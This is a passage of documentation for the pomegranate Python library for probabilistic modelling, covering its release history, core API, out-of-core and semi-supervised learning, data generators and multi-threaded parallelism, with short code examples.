is:\n\nSchreiber, J. (2018). Pomegranate: fast and flexible probabilistic modeling in python. Journal of Machine Learning Research, 18(164), 1-6.\n\nThe paper can be cited as:\n\n@article{schreiber2018pomegranate,\ntitle={Pomegranate: fast and flexible probabilistic modeling in python},\nauthor={Schreiber, Jacob},\njournal={Journal of Machine Learning Research},\nvolume={18},\nnumber={164},\npages={1--6},\nyear={2018}\n}\n\n\nAlternatively, the GitHub repository can be cited as:\n\n@misc{Schreiber2016,\nauthor = {Jacob Schreiber},\ntitle = {pomegranate},\nyear = {2016},\npublisher = {GitHub},\njournal = {GitHub repository},\nhowpublished = {\\url{https://github.com/jmschrei/pomegranate}},\ncommit = {enter commit that you used}\n}\n\n\nHow does pomegranate compare to other packages?\n\nA comparison of the features between pomegranate and others in the python ecosystem can be seen in the following two plots.", null, "The plot on the left shows model stacks which are currently supported by pomegranate. The rows show each model, and the columns show which models those can fit in. Dark blue shows model stacks which currently are supported, and light blue shows model stacks which are currently being worked on and should be available soon. For example, all models use basic distributions as their main component. However, general mixture models (GMMs) can be fit into both Naive Bayes classifiers and hidden Markov models (HMMs). Conversely, HMMs can be fit into GMMs to form mixtures of HMMs. Soon pomegranate will support models like a mixture of Bayesian networks.\n\nThe plot on the right shows features compared to other packages in the python ecosystem. Dark red indicates features which no other package supports (to my knowledge!) and orange shows areas where pomegranate has an expanded feature set compared to other packages. For example, both pomegranate and sklearn support Gaussian naive Bayes classifiers. However, pomegranate supports naive Bayes of arbitrary distributions and combinations of distributions, such as one feature being Gaussian, one being log normal, and one being exponential (useful to classify things like ionic current segments or audio segments). pomegranate also extends naive Bayes past its “naivity” to allow for features to be dependent on each other, and allows input to be more complex things like hidden Markov models and Bayesian networks. There’s no rule that each of the inputs to naive Bayes has to be the same type though, allowing you to do things like compare a markov chain to a HMM. No other package supports a HMM Naive Bayes! Packages like hmmlearn support the GMM-HMM, but for them GMM strictly means Gaussian mixture model, whereas in pomegranate it ~can~ be a Gaussian mixture model, but it can also be an arbitrary mixture model of any types of distributions. Lastly, no other package supports mixtures of HMMs despite their prominent use in things like audio decoding and biological sequence analysis.\n\nModels can be stacked more than once, though. For example, a “naive” Bayes classifier can be used to compare multiple mixtures of HMMs to each other, or compare a HMM with GMM emissions to one without GMM emissions. You can also create mixtures of HMMs with GMM emissions, and so the most stacking currently supported is a “naive” Bayes classifier of mixtures of HMMs with GMM emissions, or four levels of stacking.\n\nHow can pomegranate be faster than numpy?\n\npomegranate has been shown to be faster than numpy at updating univariate and multivariate gaussians. One of the reasons is because when you use numpy you have to use numpy.mean(X) and numpy.cov(X) which requires two full passes of the data. pomegranate uses additive sufficient statistics to reduce a dataset down to a fixed set of numbers which can be used to get an exact update. This allows pomegranate to calculate both mean and covariance in a single pass of the dataset. In addition, one of the reasons that numpy is so fast is its use of BLAS. pomegranate also uses BLAS, but uses the cython level calls to BLAS so that the data doesn’t have to pass between cython and python multiple times.\n\n## Release History¶\n\n### Version 0.12.0¶\n\n#### Highlights¶\n\n• MarkovNetwork models have been added in and include both inference and structure learning.\n• Support for Python 2 has been depricated.\n• Markov network, data generator, and callback tutorials have been added in\n• A robust from_json method has been added in to __init__.py that can deserialize JSONs from any pomegranate model.\n\n#### MarkovNetwork¶\n\n• MarkovNetwork models have been added in as a new probabilistic model.\n• Loopy belief propagation inference has been added in using the FactorGraph backend\n• Structure learning has been added in using Chow-Liu trees\n\n#### BayesianNetwork¶\n\n• Chow-Liu tree building has been sped up slightly, courtesy of @alexhenrie\n• Chow-Liu tree building was further sped up by almost an order of magnitude\n• Constraint Graphs no longer fail when passing in graphs with self loops, courtesy of @alexhenrie\n\n#### BayesClassifier¶\n\n• Updated the from_samples method to accept BayesianNetwork as an emission. This will build one Bayesian network for each class and use them as the emissions.\n\n#### Distributions¶\n\n• Added a warning to DiscreteDistribution when the user passes in an empty dictionary.\n• Fixed the sampling procedure for JointProbabilityTables.\n• GammaDistributions should have their shape issue resolved\n• The documentation for BetaDistributions has been updated to specify that it is a Beta-Bernoulli distribution.\n\n#### io¶\n\n• New file added, io.py, that contains data generators that can be operated on\n• Added DataGenerator, DataFrameGenerator, and a BaseGenerator class to inherit from\n\n#### HiddenMarkovModel¶\n\n• Added RandomState parameter to from_samples to account for randomness when building discrete models.\n\n#### Misc¶\n\n• Unneccessary calls to memset have been removed, courtesy of @alexhenrie\n• Checking for missing values has been slightly refactored to be cleaner, courtesy of @mareksmid-lucid\n• Include the LICENSE file in MANIFEST.in and simplify a bit, courtesy of @toddrme2178\n• Added in a robust from_json method that can be used to deseralize a JSON for any pomegranate model.\n\n#### docs¶\n\n• Added io.rst to briefly describe data generators\n• Added MarkovNetwork.rst to describe Markov networks\n\n#### Tutorials¶\n\n• Added in a tutorial notebook for Markov networks\n• Added in a tutorial notebook for data generators\n• Added in a tutorial notebook for callbacks\n\n#### CI¶\n\n• Removed unit tests for Py2.7 from AppVeyor and Travis\n• Added unit tests for Py3.8 to AppVeyor and Travis\n\n### Version 0.11.2¶\n\n#### Highlights¶\n\n• Faster BSNL, particularly when there is missing data, courtesy of @alexhenrie\n• GPU acceleration should be fixed\n\n#### BayesianNetwork¶\n\n• A speed improvement by making isnan an inline function, courtesy of @alexhenrie\n• A speed improvement by changing the manner that parent sets are iterated, courtesy of @alexhenrie\n\n#### Utils¶\n\n• The enable_gpu call has been moved to the bottom of the GPU checking code and so should not crash anymore.\n\n### Version 0.11.1¶\n\n#### Highlights¶\n\n• Added speed improvements to Bayesian network structure learning when missing data is present.\n\n#### BayesianNetwork¶\n\n• By default duplicates get merged in a data set so that there are fewer rows with larger weights, dramatically improving speed. However, because np.nan != np.nan, rows with missing values don’t get merged. This fix changes np.nan to None so that the rows get merged appropriately.\n• A few misc changes that sometimes improve speed.\n• Changed the probability calculation when a node is being scored given a single row. Previously it would return 0, meaning that sometimes it will return the densest graph possible erroneously. This may change your networks in edge cases, but will reduce their complexity.\n\n### Version 0.11.0¶\n\n#### Highlights¶\n\n• Allowed for user specified custom distributions by implementing a Python fallback option if the distribution object doesn’t inherit from the base distribution class.\n• Fixed an issue with GammaDistribution update\n• Removed deterministic seed being set in hmm.bake\n• Made pomegranate compatible with NetworkX v2.0 and above\n• NeuralHMMs and Neural Mixture Models are now possible through the custom distributions\n• Many new tutorials\n\n#### Distributions¶\n\n• Fixed an error in GammaDistribution’s cython level update step where sufficient statistics were incorrectly collected from a data set. This will only affect GammaDistributions that are used as part of a composition model rather than stand-alone ones.\n• Added in support for custom distributions. This is done by checking whether a distribution is inherited from the base pomegranate distribution object. If not, it will use the python methods.\n• Added in examples of using custom distributions, including neural networks, with pomegranate models.\n• Made NormalDistribution.blank and LogNormalDistribution.blank return distributions with a standard deviation of 1, to avoid DivisionByZero errors.\n• Added in a NeuralNetworkWrapper distribution that should handle wrapping a neural network correctly for use in pomegranate. This assumes a keras-like API.\n\n#### HiddenMarkovModel¶\n\n• Removed a deterministic seed being set in hmm.bake. These lines were set because it was thought that there was some randomness in either the internal state generation of the topological sort. However, it appears that this is not necessary, and so it has been removed.\n• Fixed a bug where semi-supervised learning would not work because of an undefined variable.\n• Added in support for networkx v2.0 and above using their new API.\n\n#### Tutorials¶\n\n• Revamped the tutorials in the tutorials folder, greatly expanding their scope\n• Added in new tutorials about custom distributions and neural probabilistic models\n\n### Version 0.10.0¶\n\n#### Highlights¶\n\n• Broke distributions into their own files and placed them in their own folder\n• Fixed Bayesian network failing in call to np.isnan when fitting to character data\n• Added in callbacks to all models in the style of keras, with built-ins being History, ModelCheckpoint, and CVLogger. History is calculated for each model. Use return_history=True to gt the model and the history object that contains training.\n• Added top-level Makefile for convenience in development to build/test/clean/install/uninstall with multiple conda environments.\n• Added top-level rebuildconda for convenience in development to create or re-create a conda development environment for a given python version, defaulting to 2.7.\n\n#### Callbacks¶\n\n• Added in a callbacks module, and the use of callbacks in all iterative training procedures. Callbacks are called at the beginning of training, at the end of each epoch, and at the end of the training procedure, using the respective functions. See the documentation page for more details.\n\n#### Distributions¶\n\n• Broke the distributions.pyx into a folder where each distribution has its own file. This will speed up compilation when the code is modified.\n• Added in a dtype attribute to DiscreteDistribution, ConditionalProbabilityTable, and JointProbabilityTable, to prevent automatic casting of keys as floats when converting to and from jsons\n• For MultivariateGaussianDistributions, added in an epsilon when performing a ridge adjustment on a non-positive semidefinite matrix to hopefully completely fix this issue.\n• NormalDistribution update should now check to see if the weights are below an epsilon, rather than equal to 0, resolving some stability issues.\n• Fixed an issue with BernoulliDistribution where it would raise a ZeroDivisionError when from_summaries was called with no observations.\n• Fixed an issue where an IndependentComponentsDistribution would print upon calls to log_probability\n\n#### HiddenMarkovModel¶\n\n• Changed the output to be the fit model, like in scikit-learn, instead of the total improvement, to allow for chaining\n\n• Added in callback functionality to both the fit and from_samples methods\n• Added in the return_history parameter to both the fit and from_samples methods, which will return the history callback as well as the fit model\n• Resolved an issue in the summary method where default weights were assigned to the wrong variable when not passed in.\n• Resolved an issue where printing an empty model resulted in an error.\n\n#### GeneralMixtureModel¶\n\n• Changed the output to be the fit model, like in scikit-learn, instead of the total improvement, to allow for chaining\n\n• Added in callback functionality to both the fit and from_samples methods\n• Added in the return_history parameter to both the fit and from_samples methods, which will return the history callback as well as the fit model\n\n#### NaiveBayes¶\n\n• Added in callback functionality to both the fit and from_samples methods that will be used only in semi-supervised learning\n• Added in the return_history parameter to both the fit and from_samples methods, which will return the history callback as well as the fit model that will be used only in semi-supervised learning\n\n#### BayesClassifier¶\n\n• Added in callback functionality to both the fit and from_samples methods that will be used only in semi-supervised learning\n• Added in the return_history parameter to both the fit and from_samples methods, which will return the history callback as well as the fit model that will be used only in semi-supervised learning\n\n#### BayesianNetwork¶\n\n• Modified the built keymap to be a numpy array of objects to prevent casting of all keys as the type of the first column.\n\n#### Makefile¶\n\n• There is a new top-level “convenience” Makefile for development to make it easy to develop with two conda environments. The default is for two conda environments, py2.7 and py3.6, but those could be overridden at run time with, for example, make PY3_ENV=py3.6.2 biginstall. Targets exist for install, test, bigclean, and nbtest along with variations of each that first activate either one or both conda environments. For example, make biginstall will install for both py2.7 and py3.6 environments. When developing pomegranate, one frequently wants to do a fully clean build, wipe out all installed targets, and replace them. This can be done with make bigclean biguninstall biginstall. In addition, there is a target nbtest for testing all of the jupyter notebooks to ensure that the cells run. See the Makefile for a list of additional conda packages to install for this to work. The default is to stop on first error but you can run make ALLOW_ERRORS=–allow-errors nbtest to run all cells and then inspect the html output manually for errors.\n• There is a new top-level “convenience” rebuildconda script which will remove and create a conda environment for development. Be careful using it that the environment you want to rebuild is the right one. You can list environments with conda info –envs. The default is to rebuild the 2.7 environment with name py2.7. With this, you can create an alternative environment, test it out, and remove it as in ./rebuildconda 2.7.9 ; make PY2_ENV=py2.7.9 bigclean py2build py2test py2install nbtest ; source deactivate ; conda env remove –name py2.7.9.\n\n### Version 0.9.0¶\n\n#### Highlights¶\n\n• Missing value support has been added in for all models except factor graphs. This is done by included the string nan in string datasets, or numpy.nan in numeric datasets. Model fitting and inference is supported for all models for this. The technique is to not collect sufficient statistics from missing data, not to impute the missing values.\n• The unit testing suite has been greatly expanded, from around 140 tests to around 370 tests.\n\n#### HiddenMarkovModel¶\n\n• The documentation has been fixed so that states are defined as State(NormalDistribution(0, 1)) instead of incorrectly as State(Distribution(NormalDistribution(0, 1)))\n• Fixed a bug in from_samples that was causing a TypeError if name was not specified when using DiscreteDistribution with custom labels.\n• Expanded the number of unit tests to include missing value support and be more comprehensive\n\n#### Distributions¶\n\n• Multivariate Gaussian distributions have had their parameter updates simplified. This doesn’t lead to a significant change in speed, just less code.\n• Fixed an issue where Poisson Distributions had an overflow issue caused when calculating large factorials by moving the log inside the product.\n• Fixed an issue where Poisson Distributions were not correctly calculating the probability of 0 counts.\n• Fixed an issue where Exponential Distribution would fail when fed integer 0-mode data.\n• Fixed an issue where IndependentComponentDistribution would have incorrect per-dimension weights after serialization.\n• Added in missing value support for fitting and log probability calculations for all univariate distributions, ICD, MGD, and CPTs through calculating sufficient statistics only on data that exists. The only distributions that currently do not support missing values are JointProbabilityTables and DirichletDistributions.\n• Fixed an issue with multivariate Gaussian distributions where the covariance matrix is no longer invertible with enough missing data by subtracting the smallest eigenvalue from the diagonal\n\n#### K-Means¶\n\n• Added in missing value support for k-means clustering by ignoring dimensions that are missing in the data. Can now fit and predict on missing data.\n• Added in missing value support for all initialization strategies\n• Added in a suite of unit tests\n• Added in the distance method that returns the distance between each point and each centroid\n\n#### GeneralMixtureModel¶\n\n• Added in missing value support for mixture models through updates to the distributions\n• Fixed an issue where passing in a list of distributions to from_samples along with a number of components did not produce a mixture of IndependentComponentsDistribution objects\n• Expanded the unit test suite and added tests for missing value support\n\n#### BayesianNetwork¶\n\n• Vectorized the predict_proba method to take either a single sample or a list of samples\n• Changed the output of predict_proba to be individual symbols instead of a distribution where one symbol has a probability of 1 when fed in as known prior knowledge.\n• Added in an n_jobs parameter to parallelize the prediction of samples. This does not speed up a single sample, only a batch of samples.\n• Factored out _check_input into a function that be used independently\n• Added unit tests to check each of the above functions extensively\n• Missing value support added for the log_probability, fit, and from_samples methods. Chow-Liu trees are not supported for missing values, but using a constraint graph still works.\n\n### Version 0.8.1¶\n\n#### Highlights¶\n\nThis will serve as a log for the changes added for the release of version 0.8.1.\n\n• Univariate offsets have been added to allow for distributions to be fit to a column of data rather than a vector of numbers. This stops the copying of data that had to be done previously.\n\n#### Base¶\n\n• Parameters column_idx and d have been added to the _summarize method that all models expose. This is only useful for univariate distributions and models that fit univariate distributions and can be ignored by other models. The column_idx parameter specifies which column in a data matrix the distribution should be fit to, essentially serving as an offset. d refers to the number of dimensions that the data matrix has. This means that a univariate distribution will fit to all samples i such that i*d + column_idx in a pointer array. Multivariate distributions and models using those can ignore this.\n• A convenience function to_yaml was added to State and Model classes. YAML is a superset of JSON that can be 4 to 5 times more compact. You need the yaml package installed to use it.\n\n#### Distributions¶\n\n• The summarize method has been moved from most individual distributions to the Distribution base object, as has the fit method.\n• min_std has been moved from the from_summaries method and the fit method to the __init__ method for the NormalDistribution and LogNormalDistribution objects.\n\n#### NaiveBayes¶\n\n• Moved the fit and summarize methods to BayesModel due to their similarity with BayesClassifier\n\n#### BayesClassifier¶\n\n• Moved the fit and summarize methods to BayesModel due to their similarity to NaiveBayes\n\n#### GeneralMixtureModel¶\n\n• Fixed a bug where n_jobs was ignored in the from_samples method because batch_size was reset for the k-means initialization\n\n#### HiddenMarkovModel¶\n\n• The default name of a HiddenMarkovModel has been changed from “None” to “HiddenMarkovModel”\n\n### Version 0.8.0¶\n\n#### Highlights¶\n\nThis will serve as a log for the changes added for the release of version 0.8.0.\n\n#### Changelog¶\n\n##### k-means¶\n• k-means has been changed from using iterative computation to using the alternate formulation of euclidean distance, from ||a - b||^{2} to using ||a||^{2} + ||b||^{2} - 2||a cdot b||. This allows for the centroid norms to be cached, significantly speeding up computation, and for dgemm to be used to solve the matrix matrix multiplication. Initial attempts to add in GPU support appeared unsuccessful, but in theory it should be something that can be added in.\n• k-means has been refactored to more natively support an out-of-core learning goal, by allowing for data to initially be cast as numpy memorymaps and not coercing them to arrays midway through.\n##### Hidden Markov Models¶\n• Allowed labels for labeled training to take in string names of the states instead of the state objects themselves.\n• Added in state_names and names parameters to the from_samples method to allow for more control over the creation of the model.\n• Added in semi-supervised learning to the fit step that can be activated by passing in a list of labels where sequences that have no labels have a None value. This allows for training to occur where some sequences are fully labeled and others have no labels, not for training to occur on partially labeled sequences.\n• Supervised initialization followed by semi-supervised learning added in to the from_samples method similarly to other methods. One should do this by passing in string labels for state names, always starting with <model_name>-start, where model_name is the name parameter passed into the from_samples method. Sequences that do not have labels should have a None instead of a list of corresponding labels. While semi-supervised learning using the fit method can support arbitrary transitions amongst silent states, the from_samples method does not produce silent states, and so other than the start and end states, all states should be symbol emitting states. If using semi-supervised learning, one must also pass in a list of the state names using the state_names parameter that has been added in.\n• Fixed bug in supervised learning where it would not initialize correctly due to an error in the semi-supervised learning implementation.\n• Fixed bug where model could not be plotted without pygraphviz due to an incorrect call to networkx.draw.\n##### General Mixture Models¶\n• Changed the initialization step to be done on the first batch of data instead of the entire dataset. If the entire dataset fits in memory this does not change anything. However, this allows for out-of-core updates to be done automatically instead of immediately trying to load the entire dataset into memory. This does mean that out-of-core updates will have a different initialization now, but then yield exact updates after that.\n• Fixed bug where passing in a 1D array would cause an error by recasting all 1D arrays as 2D arrays.\n##### Bayesian Networks¶\n• Added in a reduce_dataset parameter to the from_samples method that will take in a dataset and create a new dataset that is the unique set of samples, weighted by their weighted occurrence in the dataset. Essentially, it takes a dataset that may have repeating members, and produces a new dataset that is entirely unique members. This produces an identically scoring Bayesian network as before, but all structure learning algorithms can be significantly sped up. This speed up is proportional to the redundancy of the dataset, so large datasets on a smallish (< 12) number of variables will see massive speed gains (sometimes even 2-3 orders of magnitude!) whereas past that it may not be beneficial. The redundancy of the dataset (and thus the speedup) can be estimated as n_samples / n_possibilities, where n_samples is the number of samples in the dataset and n_possibilities is the product of the number of unique keys per variable, or 2**d for binary data with d variables. It can be calculated exactly as n_samples / n_unique_samples, as many datasets are biased towards repeating elements.\n• Fixed a premature optimization where the parents were stripped from conditional probability tables when saving the Bayesian Network to a json, causing an error in serialization. The premature optimization is that in theory pomegranate is set up to handle cyclic Bayesian networks and serializing that without first stripping parents would cause an infinite file size. However, a future PR that enabled cyclic Bayesian networks will account for this error.\n##### Naive Bayes¶\n• Fixed documentation of from_samples to actually refer to the naive Bayes model.\n• Added in semi-supervised learning through the EM algorithm for samples that are labeled with -1.\n##### Bayes Classifier¶\n• Fixed documentation of from_samples to actually refer to the Bayes classifier model.\n• Added in semi-supervised learning through the EM algorithm for samples that are labeled with -1.\n##### Distributions¶\n• Multivariate Gaussian Distributions can now use GPUs for both log probability and summarization calculations, speeding up both tasks ~4x for any models that use them. This is added in through CuPy.\n##### Out Of Core¶\n• The parameter “batch_size” has been added to HMMs, GMMs, and k-means models for built-in out-of-core calculations. Pass in a numpy memory map instead of an array and set the batch size for exact updates (sans initialization).\n##### Minibatching¶\n• The parameter “batches_per_epoch” has been added to HMMs, GMMs, and k-means models for build-in minibatching support. This specifies the number of batches (as defined by “batch_size”) to summarize before calculating new parameter updates.\n• The parameter “lr_decay” has been added to HMMs and GMMs that specifies the decay in the learning rate over time. Models may not converge otherwise when doing minibatching.\n##### Parallelization¶\n• n_jobs has been added to all models for both fitting and prediction steps. This allows users to make parallelized predictions with their model without having to do anything more complicated than setting a larger number of jobs.\n##### Tutorials¶\n• Removed the PyData 2016 Chicago Tutorial due to it’s similarity to tutorials_0_pomegranate_overview.\n\n## The API¶\n\npomegranate has a minimal core API that is made possible because all models are treated as a probability distribution regardless of complexity. Regardless of whether it’s a simple probability distribution, or a hidden Markov model that uses a different probability distribution on each feature, these methods can be used. Each model documentation page has an API reference showing the full set of methods and parameters for each method, but generally all models have the following methods and parameters for the methods.\n\n>>> model.probability(X)\n\n\nThis method will take in either a single sample and return its probability, or a set of samples and return the probability of each one, given the model.\n\n>>> model.log_probability(X)\n\n\nThe same as above but returns the log of the probability. This is helpful for numeric stability.\n\n>>> model.fit(X, weights=None, inertia=0.0)\n\n\nThis will fit the model to the given data with optional weights. If called on a mixture model or a hidden Markov model this runs expectation-maximization to perform iterative updates, otherwise it uses maximum likelihood estimates. The shape of data should be (n, d) where n is the number of samples and d is the dimensionality, with weights being a vector of non-negative numbers of size (n,) when passed in. The inertia shows the proportion of the prior weight to use, defaulting to ignoring the prior values.\n\n>>> model.summarize(X, weights=None)\n\n\nThis is the first step of the two step out-of-core learning API. It will take in a data set and optional weights and extract the sufficient statistics that allow for an exact update, adding to the cached values. If this is the first time that summarize is called then it will store the extracted values, if it’s not the first time then the extracted values are added to those that have already been cached.\n\n>>> model.from_summaries(inertia=0.0)\n\n\nThis is the second step in the out-of-core learning API. It will used the extracted and aggregated sufficient statistics to derive exact parameter updates for the model. Afterwards it will reset the stored values.\n\n>>> model.clear_summaries()\n\n\nThis method clears whatever summaries are left on the model without updating the parameters.\n\n>>> Model.from_samples(X, weights=None)\n\n\nThis method will initialize a model to a data set. In the case of a simple distribution it will simply extract the parameters from the case. In the more complicated case of a Bayesian network it will jointly find the best structure and the best parameters given that structure. In the case of a hidden Markov model it will first find clusters and then learn a dense transition matrix.\n\n### Compositional Methods¶\n\nThese methods are available for the compositional models, i.e., mixture models, hidden Markov models, Bayesian networks, naive Bayes classifiers, and Bayes’ classifiers. These methods perform inference on the data. In the case of Bayesian networks it will use the forward-backward algorithm to make predictions on all variables for which values are not provided. For all other models, this will return the model component that yields the highest posterior P(M|D) for some sample. This value is calculated using Bayes’ rule, where the likelihood of each sample given each component multiplied by the prior of that component is normalized by the likelihood of that sample given all components multiplied by the prior of those components.\n\n>>> model.predict(X)\n\n\nThis will return the most likely value for the data. In the case of Bayesian networks this is the most likely value that the variable takes given the structure of the network and the other observed values. In the other cases it is the model component that most likely explains this sample, such as the mixture component that a sample most likely falls under, or the class that is being predicted by a Bayes’ classifier.\n\n>>> model.predict_proba(X)\n\n\nThis returns the matrix of posterior probabilities P(M|D) directly. The predict method is simply running argmax over this matrix.\n\n>>> model.predict_log_proba(X)\n\n\nThis returns the matrix of log posterior probabilities for numerical stability.\n\n## Out of Core Learning¶\n\nSometimes datasets which we’d like to train on can’t fit in memory but we’d still like to get an exact update. pomegranate supports out of core training to allow this, by allowing models to summarize batches of data into sufficient statistics and then later on using these sufficient statistics to get an exact update for model parameters. These are done through the methods model.summarize and model.from_summaries. Let’s see an example of using it to update a normal distribution.\n\n>>> from pomegranate import *\n>>> import numpy\n>>>\n>>> a = NormalDistribution(1, 1)\n>>> b = NormalDistribution(1, 1)\n>>> X = numpy.random.normal(3, 5, size=(5000,))\n>>>\n>>> a.fit(X)\n>>> a\n{\n\"frozen\" :false,\n\"class\" :\"Distribution\",\n\"parameters\" :[\n3.012692830297519,\n4.972082359070984\n],\n\"name\" :\"NormalDistribution\"\n}\n>>> for i in range(5):\n>>> b.summarize(X[i*1000:(i+1)*1000])\n>>> b.from_summaries()\n>>> b\n{\n\"frozen\" :false,\n\"class\" :\"Distribution\",\n\"parameters\" :[\n3.01269283029752,\n4.972082359070983\n],\n\"name\" :\"NormalDistribution\"\n}\n\n\nThis is a simple example with a simple distribution, but all models and model stacks support this type of learning. Lets next look at a simple Bayesian network.\n\nWe can see that before fitting to any data, the distribution in one of the states is equal for both. After fitting the first distribution they become different as would be expected. After fitting the second one through summarize the distributions become equal again, showing that it is recovering an exact update.\n\n### FAQ¶\n\n1. How many examples should I summarize at a time?\n1. You should summarize the largest amount of data that fits in memory. The larger the block of data, the more efficient the calculations can be, particularly if GPU computing is being used.\n1. Can I still do multi-threading / use a GPU with out-of-core learning?\n1. Absolutely. You will have to call joblib yourself if you use the formulation above but the computational aspects of the call to summarize have the GIL released and so multi-threading can be used.\n1. Does out of core learning give exact or approximate updates?\n1. It gives exact updates as long as the total set of examples that are summarized is the same. Sufficient statistics are collected for each of the batches and are equal to the sufficient statistics that one would get from the full dataset. However, the initialization step is done on only a single batch. This may cause the final models to differ due simply to the different initializations. If one has pre-defined initializations and simply calls fit, then the exact same model will be yielded.\n\n## Data Generators and IO¶\n\nThe main way that data is fed into most Python machine learning models is formatted as numpy arrays. However, there are some cases where this is not convenient. The first case is when the data doesn’t fit into memory. This case was dealt with a little bit in the Out of Core documentation page. The second case is when the data lives in some other format, such as a CSV file or some type of data base, and one doesn’t want to create an entire copy of the data formatted as a numpy array.\n\nFortunately, pomegranate supports the use of data generators as input rather than only taking in numpy arrays. Data generators are objects that wrap data sets and yield batches of data in a manner that is specified by the user. Once the generator is exhausted the epoch is ended. The default data generator is to yield contiguous chunks of examples of a certain batch size until the entire data set has been seen, finish the epoch, and then start over.\n\nThe strength of data generators is that they allow the user to have a much greater degree of control over the training process than hardcoding a few training schemes. By specifying how exactly a batch is generated from the data set (and the preprocessing that might go into converting examples for use by the model) and exactly when an epoch ends, users can do a wide variety of out-of-core and mini-batch training schemes without anything needed to be built-in to pomegranate.\n\n## Semi-Supervised Learning¶\n\nSemi-supervised learning is a branch of machine learning that deals with training sets that are only partially labeled. These types of datasets are common in the world. For example, consider that one may have a few hundred images that are properly labeled as being various food items. They may wish to augment this dataset with the hundreds of thousands of unlabeled pictures of food floating around the internet, but not wish to incur the cost of having to hand label them. Unfortunately, many machine learning methods are not able to handle both labeled and unlabeled data together and so frequently either the unlabeled data is tossed out in favor of supervised learning, or the labeled data is only used to identify the meaning of clusters learned by unsupervised techniques on the unlabeled data.\n\nProbabilistic modeling offers an intuitive way of incorporating both labeled and unlabeled data into the training process through the expectation-maximization algorithm. Essentially, one will initialize the model on the labeled data, calculate the sufficient statistics of the unlabeled data and labeled data separately, and then add them together. This process can be thought of as vanilla EM on the unlabeled data except that at each iteration the sufficient statistics from the labeled data (MLE estimates) are added.\n\npomegranate follows the same convention as scikit-learn when it comes to partially labeled datasets. The label vector y is still of an equal length to the data matrix X, with labeled samples given the appropriate integer label, but unlabeled samples are given the label -1. While np.nan may be a more intuitive choice for missing labels, it isn’t used because np.nan is a double and the y vector is integers. When doing semi-supervised learning with hidden Markov models, however, one would pass in a list of labels for each labeled sequence, or None for each unlabeled sequence, instead of -1 to indicate an unlabeled sequence.\n\nAll models that support labeled data support semi-supervised learning, including naive Bayes classifiers, general Bayes classifiers, and hidden Markov models. Semi-supervised learning can be done with all extensions of these models natively, including on mixture model Bayes classifiers, mixed-distribution naive Bayes classifiers, using multi-threaded parallelism, and utilizing a GPU. Below is a simple example. Notice that there is no difference in the from_samples call, the presence of -1 in the label vector is enough.\n\nimport numpy\n\nfrom sklearn.datasets import make_blobs\nfrom sklearn.model_selection import train_test_split\nfrom pomegranate import NaiveBayes, NormalDistribution\n\nn, d, m = 50000, 5, 10\nX, y = make_blobs(n, d, m, cluster_std=10)\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1)\n\nn_unlabeled = int(X_train.shape * 0.999)\nidxs = numpy.random.choice(X_train.shape, size=n_unlabeled)\ny_train[idxs] = -1\n\nmodel = NaiveBayes.from_samples(NormalDistribution, X_train, y_train, verbose=True)\n\n\nWhile HMMs can theoretically be trained on sequences of data that are only partially labeled, currently semi-supervised learning for HMMs means that some sequences are fully labeled, and some sequences have no labels at all. This means that instead of passing in a normal label vector as a list of lists such as [[model.start, s1, s2, model.end], [model.start, s1, s1, model.end]], one would pass in a list of mixed list/None types, with lists defining the labels for labeled sequences, and None specifying that a sequence is unlabeled. For example, if the second sequence was unlabeled, one would pass in [[model.start, s1, s2, model.end], None] instead.\n\n### FAQ¶\n\n1. What ratio of unlabeled / labeled data is typically best?\n1. It’s hard to say. However, semi-supervised learning works best when the underlying distributions are more complicated than the labeled data captures. If your data is simple Gaussian blobs, not many samples are needed and adding in unlabeled samples likely will not help. However, if the true underlying distributions are some complex mixture of components but your labeled data looks like a simple blob, semi-supervised learning can help significantly.\n1. If this uses EM, what’s the difference between semi-supervised learning and a mixture model?\n1. Semi-supervised learning is a middle ground between unsupervised learning and supervised learning. As such, it adds together the sufficient statistics from unsupervised learning (using the EM algorithm) and supervised learning (using MLE) to get the complete model. An immediate benefit of this is that since there is a supervised initialization, the learned components will always align with the intended classes instead of being randomly assigning class values.\n1. Can parallelism be used with semi-supervised learning?\n1. Yes. All aspects of pomegranate that can be used with naive Bayes classifiers or general Bayes classifiers can be used in the context of semi-supervised learning in the same way one would do so in supervised learning. One need only set the n_jobs parameters as normal. Literally the only difference for the user that the label vector now contains many -1 values.\n\n## Parallelism¶\n\npomegranate supports multi-threaded parallelism through the joblib library. Typically, python applications use multi-processing in order to get around the Global Interpreter Lock (GIL) that prevents multiple threads from running in the same Python process. However, since pomegranate does most of its computation using only C level primitives, it can release the GIL and enable multiple threads to work at the same time. The main difference that a user will notice is that it is more memory efficient, because instead of copying the data across multiple processes that each have their own memory allocated, each thread in pomegranate can operate on the same single memory allocation.\n\nUsing parallelism in pomegranate is as simple as specifying the n_jobs parameter in any of the methods– both fitting and prediction methods!\n\nFor example:\n\nimport pomegranate, numpy\n\nX = numpy.random.randn(1000, 1)\n\n# No parallelism\nmodel = GeneralMixtureModel.from_samples(NormalDistribution, 3, X)\n\n# Some parallelism\nmodel = GeneralMixtureModel.from_samples(NormalDistribution, 3, X, n_jobs=2)\n\n# Maximum parallelism\nmodel = GeneralMixtureModel.from_samples(NormalDistribution, 3, X, n_jobs=-1)\n\n\nIf you instead have a fit model and you’re just looking to speed up prediction time, you need only pass the n_jobs parameter in to those methods as well.\n\nmodel = <fit model>\nX = numpy.random.randn(1000, 1)\n\n# No parallelism\ny = model.predict_proba(X)\n\n# Some parallelism\ny = model.predict_proba(X, n_jobs=2)\n\n# Maximum parallelism\ny = model.predict_proba(X, n_jobs=-1)\n\n\n### FAQ¶\n\n1. What models support parallelism?\n1. All models should support parallel fitting. All models (except for HMMs) support parallel predictions natively through the n_jobs parameter. Basic distributions do not support parallelism as they typically take a neglible amount of time to do anything with.\n1. How can I parallelize something that doesn’t have built-in parallelism?\n1. You can easily write a parallelized prediction wrapper for any model using multiprocessing. It would likely look like the following:\nfrom joblib import Parallel, delayed\nfrom pomegranate import BayesianNetwork\n\ndef parallel_predict(name, X):\n\"\"\"Load up a pomegranate model and predict a subset of X\"\"\"\n\nmodel = BayesianNetwork.from_json(name)\nreturn model.predict(X)\n\nmodel = BayesianNetwork.from_samples(X_train)\nwith open(\"model.json\", \"w\") as outfile:\noutfile.write(model.to_json())\n\nn = len(X_test)\nstarts, ends = [i*n/4 for i in range(4)], [(i+1)*n/4 for i in range(4)]\n\ny_pred = Parallel(n_jobs=4)( delayed(parallel_predict)(\nX_test[start:end]) for start, end in zip(starts, ends))\n\n1. What is the difference 